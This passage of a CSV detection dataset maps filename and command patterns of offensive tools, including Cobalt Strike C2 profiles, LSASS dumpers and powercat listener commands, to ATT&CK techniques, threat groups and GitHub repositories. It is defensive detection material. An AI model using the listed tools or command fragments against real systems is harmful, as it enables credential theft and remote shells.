T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*post_ex_obfuscate*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*Post_EX_Process_Name*,offensive_tool_keyword,cobaltstrike,SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Tylous/SourcePoint,1,1,N/A,10,10,792,122,2022-11-17T01:04:04Z,2021-08-06T20:55:26Z -*post_ex_smartinject*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*post_ex_spawnto_x64*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*post_ex_spawnto_x86*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*POST_EXPLOIT_DIR*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*post_exploitation.py*,offensive_tool_keyword,hackingtool,ALL IN ONE Hacking Tool For Hackers,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/Z4nzu/hackingtool,1,1,N/A,N/A,10,39264,4347,2023-09-13T19:08:33Z,2020-04-11T09:21:31Z -*PostDump.exe *,offensive_tool_keyword,POSTDump,perform minidump of LSASS process using few technics to avoid detection.,T1003.001 - T1055 - T1564.001,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/YOLOP0wn/POSTDump,1,0,N/A,10,2,172,21,2023-09-15T11:24:50Z,2023-09-13T11:28:51Z -*POSTDump-main*,offensive_tool_keyword,POSTDump,perform minidump of LSASS process using few technics to avoid detection.,T1003.001 - T1055 - T1564.001,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/YOLOP0wn/POSTDump,1,1,N/A,10,2,172,21,2023-09-15T11:24:50Z,2023-09-13T11:28:51Z -*postgres_default_pass.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*postgres_default_user.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*PostMulitDomainSpider.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*PostMulitMsfGetDomainInfoByBloodHound.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*PostPowershellPowerViewAddNetUser.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*PostPowershellPowerViewGetNetGroup.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*PostPowershellPowerViewGetNetGroupMember.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*PostPowershellPowerViewGetNetProcess.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*PostPowershellPowerViewUserHunter.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*PostRewMsfAuxiliaryCVE*.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*PostRewMsfExample.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*PostRewMsfPostConfInfos.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*PotatoTrigger.cpp*,offensive_tool_keyword,JuicyPotatoNG,Another Windows Local Privilege Escalation from Service Account to System,T1055.002 - T1078.003 - T1070.004,TA0005 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/antonioCoco/JuicyPotatoNG,1,1,N/A,10,8,703,90,2022-11-12T01:48:39Z,2022-09-21T17:08:35Z -*PotatoTrigger.cpp*,offensive_tool_keyword,localpotato,The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.,T1550.002 - T1078.003 - T1005 - T1070.004,TA0004 - TA0006 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/decoder-it/LocalPotato,1,0,N/A,10,5,463,69,2023-02-12T18:39:49Z,2023-01-04T18:22:29Z -*PowerBreach.ps1*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,PowerBreach.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*PowerBruteLogon.*,offensive_tool_keyword,PowerBruteLogon,Bruteforce cracking tool for windows users,T1110 - T1110.001 - T1110.002,TA0008 - TA0006 - TA0005,N/A,N/A,Credential Access,https://github.com/DarkCoderSc/PowerBruteLogon,1,1,N/A,N/A,2,112,21,2022-03-04T14:12:08Z,2021-12-01T09:40:22Z -*powercat -c * -p *,offensive_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,0,N/A,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z -*powercat -l -p 4444*,offensive_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,0,N/A,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z -*Powercat.ps1*,offensive_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,1,N/A,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z -*powerdump.ps1*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*powerdump.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*PowerExtract-main.zip*,offensive_tool_keyword,powerextract,This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process,T1003 - T1055 - T1003.001 - T1055.012,TA0007 - TA0002,N/A,N/A,Credential Access,https://github.com/powerseb/PowerExtract,1,1,N/A,N/A,1,99,14,2023-07-19T14:24:41Z,2021-12-11T15:24:44Z -*PowerForensics*,offensive_tool_keyword,PowerForensics,The purpose of PowerForensics is to provide an all inclusive framework for hard drive forensic analysis. PowerForensics currently supports NTFS and FAT file systems. and work has begun on Extended File System and HFS+ support.,T1003 - T1039 - T1046 - T1057,TA0005 - TA0007 - TA0010,N/A,N/A,Information Gathering,https://github.com/Invoke-IR/PowerForensics,1,1,N/A,N/A,10,1324,285,2022-05-20T14:43:10Z,2015-03-07T17:12:19Z -*powerglot.py*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*powerkatz.dll*,offensive_tool_keyword,HardHatC2,A C# Command & Control framework,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/DragoQCC/HardHatC2,1,1,N/A,10,10,825,133,2023-09-06T05:17:05Z,2022-12-08T19:40:47Z -*powerkatz_x64.dll*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*powerkatz_x86.dll*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*PowerLessShell*,offensive_tool_keyword,PowerLessShell,PowerLessShell rely on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. You can also execute raw shellcode using the same approach.,T1218.010 - T1059 - T1105 - T1047 - T1055,TA0002 - TA0011 - TA0008,N/A,N/A,Defense Evasion,https://github.com/Mr-Un1k0d3r/PowerLessShell,1,1,N/A,N/A,10,1393,253,2023-03-23T13:30:14Z,2017-05-29T23:03:52Z -*PowerLessShell.py*,offensive_tool_keyword,PowerLessShell,PowerLessShell rely on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. You can also execute raw shellcode using the same approach.,T1218.010 - T1059 - T1105 - T1047 - T1055,TA0002 - TA0011 - TA0008,N/A,N/A,Defense Evasion,https://github.com/Mr-Un1k0d3r/PowerLessShell,1,1,N/A,N/A,10,1393,253,2023-03-23T13:30:14Z,2017-05-29T23:03:52Z -*powermad.ps1*,offensive_tool_keyword,Powermad,PowerShell MachineAccountQuota and DNS exploit tools,T1087 - T1098 - T1018 - T1046 - T1081,TA0007 - TA0006 - TA0005 - TA0001,N/A,N/A,POST Exploitation tools,https://github.com/Kevin-Robertson/Powermad,1,1,N/A,N/A,10,1021,171,2023-01-11T00:48:35Z,2017-09-05T18:34:03Z -*Powermad.psd1*,offensive_tool_keyword,Powermad,PowerShell MachineAccountQuota and DNS exploit tools,T1087 - T1098 - T1018 - T1046 - T1081,TA0007 - TA0006 - TA0005 - TA0001,N/A,N/A,POST Exploitation tools,https://github.com/Kevin-Robertson/Powermad,1,1,N/A,N/A,10,1021,171,2023-01-11T00:48:35Z,2017-09-05T18:34:03Z -*Powermad.psm1*,offensive_tool_keyword,Powermad,PowerShell MachineAccountQuota and DNS exploit tools,T1087 - T1098 - T1018 - T1046 - T1081,TA0007 - TA0006 - TA0005 - TA0001,N/A,N/A,POST Exploitation tools,https://github.com/Kevin-Robertson/Powermad,1,1,N/A,N/A,10,1021,171,2023-01-11T00:48:35Z,2017-09-05T18:34:03Z -*Powermad-master*,offensive_tool_keyword,Powermad,PowerShell MachineAccountQuota and DNS exploit tools,T1087 - T1098 - T1018 - T1046 - T1081,TA0007 - TA0006 - TA0005 - TA0001,N/A,N/A,POST Exploitation tools,https://github.com/Kevin-Robertson/Powermad,1,1,N/A,N/A,10,1021,171,2023-01-11T00:48:35Z,2017-09-05T18:34:03Z -*PowerMemory*,offensive_tool_keyword,PowerMemory,Exploit the credentials present in files and memory,T1003 - T1555 - T1213 - T1558,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/giMini/PowerMemory,1,0,N/A,N/A,9,819,219,2023-05-25T17:58:53Z,2015-08-29T17:09:23Z -*PowerOPS*,offensive_tool_keyword,PowerOPS,PowerOPS is an application written in C# that does not rely on powershell.exe but runs PowerShell commands and functions within a powershell runspace environment (.NET). It intends to include multiple offensive PowerShell modules to make the process of Post Exploitation easier.,T1059 - T1027 - T1053 - T1129 - T1086,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/fdiskyou/PowerOPS,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*powerpick -Command *,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,0,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*powerpick.py*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*PowerPick.x64.dll*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*Powerpreter.psm1*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation 